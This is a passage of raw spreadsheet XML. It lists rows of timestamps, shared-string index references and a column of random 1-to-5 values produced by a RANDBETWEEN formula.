      <c r="C24748" t="s">
        <v>10</v>
      </c>
      <c r="D24748" t="s">
        <v>36</v>
      </c>
      <c r="E24748" s="2" t="s">
        <v>22448</v>
      </c>
      <c r="F24748">
        <f t="shared" ca="1" si="386"/>
        <v>5</v>
      </c>
    </row>
    <row r="24749" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24749" s="1">
        <v>42977.573136574072</v>
      </c>
      <c r="C24749" t="s">
        <v>6</v>
      </c>
      <c r="D24749" t="s">
        <v>821</v>
      </c>
      <c r="E24749" t="s">
        <v>22449</v>
      </c>
      <c r="F24749">
        <f t="shared" ca="1" si="386"/>
        <v>2</v>
      </c>
    </row>
    <row r="24750" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24750" s="1">
        <v>42977.570625</v>
      </c>
      <c r="C24750" t="s">
        <v>10</v>
      </c>
      <c r="D24750" t="s">
        <v>192</v>
      </c>
      <c r="E24750" t="s">
        <v>22450</v>
      </c>
      <c r="F24750">
        <f t="shared" ca="1" si="386"/>
        <v>1</v>
      </c>
    </row>
    <row r="24751" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24751" s="1">
        <v>42977.549687500003</v>
      </c>
      <c r="C24751" t="s">
        <v>10</v>
      </c>
      <c r="D24751" t="s">
        <v>6</v>
      </c>
      <c r="E24751" t="s">
        <v>22451</v>
      </c>
      <c r="F24751">
        <f t="shared" ca="1" si="386"/>
        <v>2</v>
      </c>
    </row>
    <row r="24752" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24752" s="1">
        <v>42977.547662037039</v>
      </c>
      <c r="C24752" t="s">
        <v>10</v>
      </c>
      <c r="D24752" t="s">
        <v>80</v>
      </c>
      <c r="E24752" t="s">
        <v>22452</v>
      </c>
      <c r="F24752">
        <f t="shared" ca="1" si="386"/>
        <v>2</v>
      </c>
    </row>
    <row r="24753" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24753" s="1">
        <v>42977.513715277775</v>
      </c>
      <c r="C24753" t="s">
        <v>10</v>
      </c>
      <c r="D24753" t="s">
        <v>480</v>
      </c>
      <c r="E24753" t="s">
        <v>22453</v>
      </c>
      <c r="F24753">
        <f t="shared" ca="1" si="386"/>
        <v>2</v>
      </c>
    </row>
    <row r="24754" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24754" s="1">
        <v>42977.490555555552</v>
      </c>
      <c r="C24754" t="s">
        <v>10</v>
      </c>
      <c r="D24754" t="s">
        <v>178</v>
      </c>
      <c r="E24754" t="s">
        <v>22454</v>
      </c>
      <c r="F24754">
        <f t="shared" ca="1" si="386"/>
        <v>3</v>
      </c>
    </row>
    <row r="24755" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24755" s="1">
        <v>42977.483726851853</v>
      </c>
      <c r="C24755" t="s">
        <v>10</v>
      </c>
      <c r="D24755" t="s">
        <v>80</v>
      </c>
      <c r="E24755" t="s">
        <v>22455</v>
      </c>
      <c r="F24755">
        <f t="shared" ca="1" si="386"/>
        <v>4</v>
      </c>
    </row>
    <row r="24756" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24756" s="1">
        <v>42977.472453703704</v>
      </c>
      <c r="C24756" t="s">
        <v>48</v>
      </c>
      <c r="E24756" t="s">
        <v>22456</v>
      </c>
      <c r="F24756">
        <f t="shared" ca="1" si="386"/>
        <v>5</v>
      </c>
    </row>
    <row r="24757" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24757" s="1">
        <v>42977.450300925928</v>
      </c>
      <c r="C24757" t="s">
        <v>65</v>
      </c>
      <c r="E24757" s="2" t="s">
        <v>22457</v>
      </c>
      <c r="F24757">
        <f t="shared" ca="1" si="386"/>
        <v>3</v>
      </c>
    </row>
    <row r="24758" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24758" s="1">
        <v>42977.419560185182</v>
      </c>
      <c r="C24758" t="s">
        <v>6</v>
      </c>
      <c r="D24758" t="s">
        <v>124</v>
      </c>
      <c r="E24758" t="s">
        <v>22458</v>
      </c>
      <c r="F24758">
        <f t="shared" ca="1" si="386"/>
        <v>3</v>
      </c>
    </row>
    <row r="24759" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24759" s="1">
        <v>42977.396817129629</v>
      </c>
      <c r="C24759" t="s">
        <v>623</v>
      </c>
      <c r="E24759" s="2" t="s">
        <v>22459</v>
      </c>
      <c r="F24759">
        <f t="shared" ca="1" si="386"/>
        <v>1</v>
      </c>
    </row>
    <row r="24760" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24760" s="1">
        <v>42977.383900462963</v>
      </c>
      <c r="C24760" t="s">
        <v>461</v>
      </c>
      <c r="E24760" s="2" t="s">
        <v>22460</v>
      </c>
      <c r="F24760">
        <f t="shared" ca="1" si="386"/>
        <v>2</v>
      </c>
    </row>
    <row r="24761" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24761" s="1">
        <v>42977.378912037035</v>
      </c>
      <c r="C24761" t="s">
        <v>60</v>
      </c>
      <c r="E24761" t="s">
        <v>22461</v>
      </c>
      <c r="F24761">
        <f t="shared" ca="1" si="386"/>
        <v>3</v>
      </c>
    </row>
    <row r="24762" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A24762" s="1">
        <v>42977.370625000003</v>
      </c>
      <c r="C24762" t="s">
        <v>65</v>
      </c>
      <c r="E24762" s="2" t="s">
        <v>22462</v>
      </c>
      <c r="F24762">
        <f t="shared" ca="1" si="386"/>
        <v>3</v>
      </c>
    </row>
    <row r="24763" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A24763" s="1">
        <v>42977.364525462966</v>
      </c>
      <c r="C24763" t="s">
        <v>10</v>
      </c>
      <c r="D24763" t="s">
        <v>271</v>
      </c>
      <c r="E24763" s="2" t="s">
        <v>22463</v>
      </c>
      <c r="F24763">
        <f t="shared" ca="1" si="386"/>
        <v>5</v>
      </c>
    </row>
    <row r="24764" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24764" s="1">
        <v>42977.357210648152</v>
      </c>
      <c r="C24764" t="s">
        <v>6</v>
      </c>
      <c r="D24764" t="s">
        <v>25</v>
      </c>
      <c r="E24764" s="2" t="s">
        <v>22464</v>
      </c>
      <c r="F24764">
        <f t="shared" ca="1" si="386"/>
        <v>2</v>
      </c>
    </row>
    <row r="24765" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24765" s="1">
        <v>42977.215856481482</v>
      </c>
      <c r="C24765" t="s">
        <v>60</v>
      </c>
      <c r="E24765" t="s">
        <v>22465</v>
      </c>
      <c r="F24765">
        <f t="shared" ca="1" si="386"/>
        <v>1</v>
      </c>
    </row>
    <row r="24766" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24766" s="1">
        <v>42977.194293981483</v>
      </c>
      <c r="C24766" t="s">
        <v>140</v>
      </c>
      <c r="D24766" t="s">
        <v>312</v>
      </c>
      <c r="E24766" t="s">
        <v>22466</v>
      </c>
      <c r="F24766">
        <f t="shared" ca="1" si="386"/>
        <v>4</v>
      </c>
    </row>
    <row r="24767" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A24767" s="1">
        <v>42977.190023148149</v>
      </c>
      <c r="C24767" t="s">
        <v>542</v>
      </c>
      <c r="E24767" s="2" t="s">
        <v>22467</v>
      </c>
      <c r="F24767">
        <f t="shared" ca="1" si="386"/>
        <v>3</v>
      </c>
    </row>
    <row r="24768" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24768" s="1">
        <v>42977.181793981479</v>
      </c>
      <c r="C24768" t="s">
        <v>71</v>
      </c>
      <c r="E24768" s="2" t="s">
        <v>22468</v>
      </c>
      <c r="F24768">
        <f t="shared" ca="1" si="386"/>
        <v>5</v>
      </c>
    </row>
    <row r="24769" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24769" s="1">
        <v>42977.139988425923</v>
      </c>
      <c r="C24769" t="s">
        <v>140</v>
      </c>
      <c r="D24769" t="s">
        <v>197</v>
      </c>
      <c r="E24769" t="s">
        <v>22469</v>
      </c>
      <c r="F24769">
        <f t="shared" ca="1" si="386"/>
        <v>4</v>
      </c>
    </row>
    <row r="24770" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24770" s="1">
        <v>42977.127696759257</v>
      </c>
      <c r="C24770" t="s">
        <v>71</v>
      </c>
      <c r="E24770" t="s">
        <v>22470</v>
      </c>
      <c r="F24770">
        <f t="shared" ref="F24770:F24833" ca="1" si="387">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="24771" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24771" s="1">
        <v>42977.106400462966</v>
      </c>
      <c r="C24771" t="s">
        <v>41</v>
      </c>
      <c r="E24771" t="s">
        <v>22471</v>
      </c>
      <c r="F24771">
        <f t="shared" ca="1" si="387"/>
        <v>5</v>
      </c>
    </row>
    <row r="24772" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24772" s="1">
        <v>42977.099189814813</v>
      </c>
      <c r="C24772" t="s">
        <v>41</v>
      </c>
      <c r="E24772" t="s">
        <v>22472</v>
      </c>
      <c r="F24772">
        <f t="shared" ca="1" si="387"/>
        <v>3</v>
      </c>
    </row>
    <row r="24773" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24773" s="1">
        <v>42976.905902777777</v>
      </c>
      <c r="C24773" t="s">
        <v>10</v>
      </c>
      <c r="D24773" t="s">
        <v>89</v>
      </c>
      <c r="E24773" t="s">
        <v>22473</v>
      </c>
      <c r="F24773">
        <f t="shared" ca="1" si="387"/>
        <v>2</v>
      </c>
    </row>
    <row r="24774" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A24774" s="1">
        <v>42976.802986111114</v>
      </c>
      <c r="C24774" t="s">
        <v>301</v>
      </c>
      <c r="E24774" s="2" t="s">
        <v>22474</v>
      </c>
      <c r="F24774">
        <f t="shared" ca="1" si="387"/>
        <v>2</v>
      </c>
    </row>
    <row r="24775" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24775" s="1">
        <v>42976.79587962963</v>
      </c>
      <c r="C24775" t="s">
        <v>6</v>
      </c>
      <c r="D24775" t="s">
        <v>821</v>
      </c>
      <c r="E24775" s="2" t="s">
        <v>22475</v>
      </c>
      <c r="F24775">
        <f t="shared" ca="1" si="387"/>
        <v>2</v>
      </c>
    </row>
    <row r="24776" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24776" s="1">
        <v>42976.744143518517</v>
      </c>
      <c r="C24776" t="s">
        <v>10</v>
      </c>
      <c r="D24776" t="s">
        <v>667</v>
      </c>
      <c r="E24776" t="s">
        <v>22476</v>
      </c>
      <c r="F24776">
        <f t="shared" ca="1" si="387"/>
        <v>2</v>
      </c>
    </row>
    <row r="24777" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24777" s="1">
        <v>42976.678923611114</v>
      </c>
      <c r="C24777" t="s">
        <v>10</v>
      </c>
      <c r="D24777" t="s">
        <v>163</v>
      </c>
      <c r="E24777" t="s">
        <v>22477</v>
      </c>
      <c r="F24777">
        <f t="shared" ca="1" si="387"/>
        <v>4</v>
      </c>
    </row>
    <row r="24778" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24778" s="1">
        <v>42976.64707175926</v>
      </c>
      <c r="C24778" t="s">
        <v>10</v>
      </c>
      <c r="D24778" t="s">
        <v>271</v>
      </c>
      <c r="E24778" t="s">
        <v>22478</v>
      </c>
      <c r="F24778">
        <f t="shared" ca="1" si="387"/>
        <v>1</v>
      </c>
    </row>
    <row r="24779" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24779" s="1">
        <v>42976.640347222223</v>
      </c>
      <c r="C24779" t="s">
        <v>10</v>
      </c>
      <c r="D24779" t="s">
        <v>336</v>
      </c>
      <c r="E24779" t="s">
        <v>22479</v>
      </c>
      <c r="F24779">
        <f t="shared" ca="1" si="387"/>
        <v>1</v>
      </c>
    </row>
    <row r="24780" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24780" s="1">
        <v>42976.561076388891</v>
      </c>
      <c r="C24780" t="s">
        <v>10</v>
      </c>
      <c r="D24780" t="s">
        <v>52</v>
      </c>
      <c r="E24780" t="s">
        <v>22480</v>
      </c>
      <c r="F24780">
        <f t="shared" ca="1" si="387"/>
        <v>3</v>
      </c>
    </row>
    <row r="24781" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24781" s="1">
        <v>42976.554409722223</v>
      </c>
      <c r="C24781" t="s">
        <v>10</v>
      </c>
      <c r="D24781" t="s">
        <v>222</v>
      </c>
      <c r="F24781">
        <f t="shared" ca="1" si="387"/>
        <v>2</v>
      </c>
    </row>
    <row r="24782" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24782" s="1">
        <v>42976.549351851849</v>
      </c>
      <c r="C24782" t="s">
        <v>10</v>
      </c>
      <c r="D24782" t="s">
        <v>11</v>
      </c>
      <c r="E24782" t="s">
        <v>22481</v>
      </c>
      <c r="F24782">
        <f t="shared" ca="1" si="387"/>
        <v>2</v>
      </c>
    </row>
    <row r="24783" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24783" s="1">
        <v>42976.538159722222</v>
      </c>
      <c r="C24783" t="s">
        <v>140</v>
      </c>
      <c r="D24783" t="s">
        <v>141</v>
      </c>
      <c r="E24783" t="s">
        <v>22482</v>
      </c>
      <c r="F24783">
        <f t="shared" ca="1" si="387"/>
        <v>3</v>
      </c>
    </row>
    <row r="24784" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24784" s="1">
        <v>42976.519502314812</v>
      </c>
      <c r="C24784" t="s">
        <v>10</v>
      </c>
      <c r="D24784" t="s">
        <v>158</v>
      </c>
      <c r="E24784" s="2" t="s">
        <v>22483</v>
      </c>
      <c r="F24784">
        <f t="shared" ca="1" si="387"/>
        <v>3</v>
      </c>
    </row>
    <row r="24785" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24785" s="1">
        <v>42976.506342592591</v>
      </c>
      <c r="C24785" t="s">
        <v>10</v>
      </c>
      <c r="D24785" t="s">
        <v>94</v>
      </c>
      <c r="E24785" t="s">
        <v>22484</v>
      </c>
      <c r="F24785">
        <f t="shared" ca="1" si="387"/>
        <v>2</v>
      </c>
    </row>
    <row r="24786" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24786" s="1">
        <v>42976.503750000003</v>
      </c>
      <c r="C24786" t="s">
        <v>10</v>
      </c>
      <c r="D24786" t="s">
        <v>86</v>
      </c>
      <c r="E24786" s="2" t="s">
        <v>22485</v>
      </c>
      <c r="F24786">
        <f t="shared" ca="1" si="387"/>
        <v>5</v>
      </c>
    </row>
    <row r="24787" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24787" s="1">
        <v>42976.48201388889</v>
      </c>
      <c r="C24787" t="s">
        <v>10</v>
      </c>
      <c r="D24787" t="s">
        <v>80</v>
      </c>
      <c r="E24787" t="s">
        <v>22486</v>
      </c>
      <c r="F24787">
        <f t="shared" ca="1" si="387"/>
        <v>4</v>
      </c>
    </row>
    <row r="24788" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24788" s="1">
        <v>42976.481608796297</v>
      </c>
      <c r="C24788" t="s">
        <v>10</v>
      </c>
      <c r="D24788" t="s">
        <v>263</v>
      </c>
      <c r="E24788" t="s">
        <v>22487</v>
      </c>
      <c r="F24788">
        <f t="shared" ca="1" si="387"/>
        <v>3</v>
      </c>
    </row>
    <row r="24789" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24789" s="1">
        <v>42976.478854166664</v>
      </c>
      <c r="C24789" t="s">
        <v>10</v>
      </c>
      <c r="D24789" t="s">
        <v>494</v>
      </c>
      <c r="E24789" s="2" t="s">
        <v>22488</v>
      </c>
      <c r="F24789">
        <f t="shared" ca="1" si="387"/>
        <v>3</v>
      </c>
    </row>
    <row r="24790" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24790" s="1">
        <v>42976.461412037039</v>
      </c>
      <c r="C24790" t="s">
        <v>10</v>
      </c>
      <c r="D24790" t="s">
        <v>151</v>
      </c>
      <c r="E24790" t="s">
        <v>22489</v>
      </c>
      <c r="F24790">
        <f t="shared" ca="1" si="387"/>
        <v>4</v>
      </c>
    </row>
    <row r="24791" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24791" s="1">
        <v>42976.443229166667</v>
      </c>
      <c r="C24791" t="s">
        <v>10</v>
      </c>
      <c r="D24791" t="s">
        <v>151</v>
      </c>
      <c r="E24791" t="s">
        <v>22490</v>
      </c>
      <c r="F24791">
        <f t="shared" ca="1" si="387"/>
        <v>3</v>
      </c>
    </row>
    <row r="24792" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24792" s="1">
        <v>42976.44023148148</v>
      </c>
      <c r="C24792" t="s">
        <v>48</v>
      </c>
      <c r="E24792" t="s">
        <v>22491</v>
      </c>
      <c r="F24792">
        <f t="shared" ca="1" si="387"/>
        <v>1</v>
      </c>
    </row>
    <row r="24793" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24793" s="1">
        <v>42976.408530092594</v>
      </c>
      <c r="C24793" t="s">
        <v>10</v>
      </c>
      <c r="D24793" t="s">
        <v>290</v>
      </c>
      <c r="E24793" s="2" t="s">
        <v>22492</v>
      </c>
      <c r="F24793">
        <f t="shared" ca="1" si="387"/>
        <v>1</v>
      </c>
    </row>
    <row r="24794" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24794" s="1">
        <v>42976.392511574071</v>
      </c>
      <c r="C24794" t="s">
        <v>173</v>
      </c>
      <c r="E24794" s="2" t="s">
        <v>22493</v>
      </c>
      <c r="F24794">
        <f t="shared" ca="1" si="387"/>
        <v>5</v>
      </c>
    </row>
    <row r="24795" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24795" s="1">
        <v>42976.391643518517</v>
      </c>
      <c r="C24795" t="s">
        <v>10</v>
      </c>
      <c r="D24795" t="s">
        <v>192</v>
      </c>
      <c r="E24795" t="s">
        <v>22494</v>
      </c>
      <c r="F24795">
        <f t="shared" ca="1" si="387"/>
        <v>3</v>
      </c>
    </row>
    <row r="24796" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A24796" s="1">
        <v>42976.38722222222</v>
      </c>
      <c r="C24796" t="s">
        <v>71</v>
      </c>
      <c r="E24796" s="2" t="s">
        <v>22495</v>
      </c>
      <c r="F24796">
        <f t="shared" ca="1" si="387"/>
        <v>1</v>
      </c>
    </row>
    <row r="24797" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24797" s="1">
        <v>42976.381574074076</v>
      </c>
      <c r="C24797" t="s">
        <v>48</v>
      </c>
      <c r="E24797" t="s">
        <v>22496</v>
      </c>
      <c r="F24797">
        <f t="shared" ca="1" si="387"/>
        <v>2</v>
      </c>
    </row>
    <row r="24798" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24798" s="1">
        <v>42976.377881944441</v>
      </c>
      <c r="C24798" t="s">
        <v>776</v>
      </c>
      <c r="E24798" t="s">
        <v>22497</v>
      </c>
      <c r="F24798">
        <f t="shared" ca="1" si="387"/>
        <v>4</v>
      </c>
    </row>
    <row r="24799" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24799" s="1">
        <v>42976.368043981478</v>
      </c>
      <c r="C24799" t="s">
        <v>41</v>
      </c>
      <c r="D24799" t="s">
        <v>312</v>
      </c>
      <c r="E24799" t="s">
        <v>22498</v>
      </c>
      <c r="F24799">
        <f t="shared" ca="1" si="387"/>
        <v>3</v>
      </c>
    </row>
    <row r="24800" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24800" s="1">
        <v>42976.366898148146</v>
      </c>
      <c r="C24800" t="s">
        <v>10</v>
      </c>
      <c r="D24800" t="s">
        <v>112</v>
      </c>
      <c r="E24800" t="s">
        <v>22499</v>
      </c>
      <c r="F24800">
        <f t="shared" ca="1" si="387"/>
        <v>1</v>
      </c>
    </row>
    <row r="24801" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24801" s="1">
        <v>42976.347546296296</v>
      </c>
      <c r="C24801" t="s">
        <v>10</v>
      </c>
      <c r="D24801" t="s">
        <v>20</v>
      </c>
      <c r="E24801" t="s">
        <v>22500</v>
      </c>
      <c r="F24801">
        <f t="shared" ca="1" si="387"/>
        <v>1</v>
      </c>
    </row>
    <row r="24802" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A24802" s="1">
        <v>42976.342800925922</v>
      </c>
      <c r="C24802" t="s">
        <v>535</v>
      </c>
      <c r="E24802" s="2" t="s">
        <v>22501</v>
      </c>
      <c r="F24802">
        <f t="shared" ca="1" si="387"/>
        <v>5</v>
      </c>
    </row>
    <row r="24803" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24803" s="1">
        <v>42976.338472222225</v>
      </c>
      <c r="C24803" t="s">
        <v>10</v>
      </c>
      <c r="D24803" t="s">
        <v>36</v>
      </c>
      <c r="E24803" s="2" t="s">
        <v>22502</v>
      </c>
      <c r="F24803">
        <f t="shared" ca="1" si="387"/>
        <v>5</v>
      </c>
    </row>
    <row r="24804" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24804" s="1">
        <v>42976.333287037036</v>
      </c>
      <c r="C24804" t="s">
        <v>43</v>
      </c>
      <c r="E24804" t="s">
        <v>22503</v>
      </c>
      <c r="F24804">
        <f t="shared" ca="1" si="387"/>
        <v>1</v>
      </c>
    </row>
    <row r="24805" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A24805" s="1">
        <v>42976.306400462963</v>
      </c>
      <c r="C24805" t="s">
        <v>48</v>
      </c>
      <c r="E24805" s="2" t="s">
        <v>22504</v>
      </c>
      <c r="F24805">
        <f t="shared" ca="1" si="387"/>
        <v>4</v>
      </c>
    </row>
    <row r="24806" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24806" s="1">
        <v>42976.27380787037</v>
      </c>
      <c r="C24806" t="s">
        <v>10</v>
      </c>
      <c r="D24806" t="s">
        <v>178</v>
      </c>
      <c r="E24806" t="s">
        <v>22505</v>
      </c>
      <c r="F24806">
        <f t="shared" ca="1" si="387"/>
        <v>4</v>
      </c>
    </row>
    <row r="24807" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24807" s="1">
        <v>42976.265752314815</v>
      </c>
      <c r="C24807" t="s">
        <v>71</v>
      </c>
      <c r="E24807" t="s">
        <v>828</v>
      </c>
      <c r="F24807">
        <f t="shared" ca="1" si="387"/>
        <v>4</v>
      </c>
    </row>
    <row r="24808" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24808" s="1">
        <v>42976.245254629626</v>
      </c>
      <c r="C24808" t="s">
        <v>65</v>
      </c>
      <c r="E24808" s="2" t="s">
        <v>22506</v>
      </c>
      <c r="F24808">
        <f t="shared" ca="1" si="387"/>
        <v>1</v>
      </c>
    </row>
    <row r="24809" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24809" s="1">
        <v>42976.203460648147</v>
      </c>
      <c r="C24809" t="s">
        <v>139</v>
      </c>
      <c r="E24809" s="2" t="s">
        <v>22507</v>
      </c>
      <c r="F24809">
        <f t="shared" ca="1" si="387"/>
        <v>1</v>
      </c>
    </row>
    <row r="24810" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24810" s="1">
        <v>42976.198553240742</v>
      </c>
      <c r="C24810" t="s">
        <v>559</v>
      </c>
      <c r="E24810" s="2" t="s">
        <v>22508</v>
      </c>
      <c r="F24810">
        <f t="shared" ca="1" si="387"/>
        <v>1</v>
      </c>
    </row>
    <row r="24811" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24811" s="1">
        <v>42976.194016203706</v>
      </c>
      <c r="C24811" t="s">
        <v>41</v>
      </c>
      <c r="E24811" t="s">
        <v>22509</v>
      </c>
      <c r="F24811">
        <f t="shared" ca="1" si="387"/>
        <v>1</v>
      </c>
    </row>
    <row r="24812" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24812" s="1">
        <v>42976.161863425928</v>
      </c>
      <c r="C24812" t="s">
        <v>124</v>
      </c>
      <c r="E24812" s="2" t="s">
        <v>22510</v>
      </c>
      <c r="F24812">
        <f t="shared" ca="1" si="387"/>
        <v>5</v>
      </c>
    </row>
    <row r="24813" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24813" s="1">
        <v>42976.160810185182</v>
      </c>
      <c r="C24813" t="s">
        <v>71</v>
      </c>
      <c r="E24813" t="s">
        <v>22511</v>
      </c>
      <c r="F24813">
        <f t="shared" ca="1" si="387"/>
        <v>2</v>
      </c>
    </row>
    <row r="24814" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24814" s="1">
        <v>42976.159016203703</v>
      </c>
      <c r="C24814" t="s">
        <v>71</v>
      </c>
      <c r="E24814" t="s">
        <v>22512</v>
      </c>
      <c r="F24814">
        <f t="shared" ca="1" si="387"/>
        <v>3</v>
      </c>
    </row>
    <row r="24815" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A24815" s="1">
        <v>42976.15829861111</v>
      </c>
      <c r="C24815" t="s">
        <v>65</v>
      </c>
      <c r="E24815" s="2" t="s">
        <v>22513</v>
      </c>
      <c r="F24815">
        <f t="shared" ca="1" si="387"/>
        <v>2</v>
      </c>
    </row>
    <row r="24816" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24816" s="1">
        <v>42976.110821759263</v>
      </c>
      <c r="C24816" t="s">
        <v>48</v>
      </c>
      <c r="E24816" t="s">
        <v>22514</v>
      </c>
      <c r="F24816">
        <f t="shared" ca="1" si="387"/>
        <v>3</v>
      </c>
    </row>
    <row r="24817" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24817" s="1">
        <v>42976.086527777778</v>
      </c>
      <c r="C24817" t="s">
        <v>173</v>
      </c>
      <c r="E24817" s="2" t="s">
        <v>22515</v>
      </c>
      <c r="F24817">
        <f t="shared" ca="1" si="387"/>
        <v>2</v>
      </c>
    </row>
    <row r="24818" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24818" s="1">
        <v>42976.074606481481</v>
      </c>
      <c r="C24818" t="s">
        <v>60</v>
      </c>
      <c r="E24818" s="2" t="s">
        <v>22516</v>
      </c>
      <c r="F24818">
        <f t="shared" ca="1" si="387"/>
        <v>4</v>
      </c>
    </row>
    <row r="24819" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24819" s="1">
        <v>42975.831307870372</v>
      </c>
      <c r="C24819" t="s">
        <v>10</v>
      </c>
      <c r="D24819" t="s">
        <v>39</v>
      </c>
      <c r="F24819">
        <f t="shared" ca="1" si="387"/>
        <v>4</v>
      </c>
    </row>
    <row r="24820" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24820" s="1">
        <v>42975.83116898148</v>
      </c>
      <c r="C24820" t="s">
        <v>140</v>
      </c>
      <c r="D24820" t="s">
        <v>141</v>
      </c>
      <c r="E24820" t="s">
        <v>22517</v>
      </c>
      <c r="F24820">
        <f t="shared" ca="1" si="387"/>
        <v>1</v>
      </c>
    </row>
    <row r="24821" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24821" s="1">
        <v>42975.828402777777</v>
      </c>
      <c r="C24821" t="s">
        <v>10</v>
      </c>
      <c r="D24821" t="s">
        <v>11</v>
      </c>
      <c r="E24821" t="s">
        <v>22518</v>
      </c>
      <c r="F24821">
        <f t="shared" ca="1" si="387"/>
        <v>3</v>
      </c>
    </row>
    <row r="24822" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24822" s="1">
        <v>42975.821076388886</v>
      </c>
      <c r="C24822" t="s">
        <v>10</v>
      </c>
      <c r="D24822" t="s">
        <v>6</v>
      </c>
      <c r="E24822" s="2" t="s">
        <v>22519</v>
      </c>
      <c r="F24822">
        <f t="shared" ca="1" si="387"/>
        <v>2</v>
      </c>
    </row>
    <row r="24823" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24823" s="1">
        <v>42975.803124999999</v>
      </c>
      <c r="C24823" t="s">
        <v>10</v>
      </c>
      <c r="D24823" t="s">
        <v>112</v>
      </c>
      <c r="E24823" t="s">
        <v>22520</v>
      </c>
      <c r="F24823">
        <f t="shared" ca="1" si="387"/>
        <v>1</v>
      </c>
    </row>
    <row r="24824" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24824" s="1">
        <v>42975.755104166667</v>
      </c>
      <c r="C24824" t="s">
        <v>6</v>
      </c>
      <c r="D24824" t="s">
        <v>25</v>
      </c>
      <c r="E24824" t="s">
        <v>22521</v>
      </c>
      <c r="F24824">
        <f t="shared" ca="1" si="387"/>
        <v>1</v>
      </c>
    </row>
    <row r="24825" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A24825" s="1">
        <v>42975.722812499997</v>
      </c>
      <c r="C24825" t="s">
        <v>10</v>
      </c>
      <c r="D24825" t="s">
        <v>6</v>
      </c>
      <c r="E24825" s="2" t="s">
        <v>22522</v>
      </c>
      <c r="F24825">
        <f t="shared" ca="1" si="387"/>
        <v>3</v>
      </c>
    </row>
    <row r="24826" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24826" s="1">
        <v>42975.697372685187</v>
      </c>
      <c r="C24826" t="s">
        <v>1050</v>
      </c>
      <c r="E24826" s="2" t="s">
        <v>22523</v>
      </c>
      <c r="F24826">
        <f t="shared" ca="1" si="387"/>
        <v>4</v>
      </c>
    </row>
    <row r="24827" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24827" s="1">
        <v>42975.673055555555</v>
      </c>
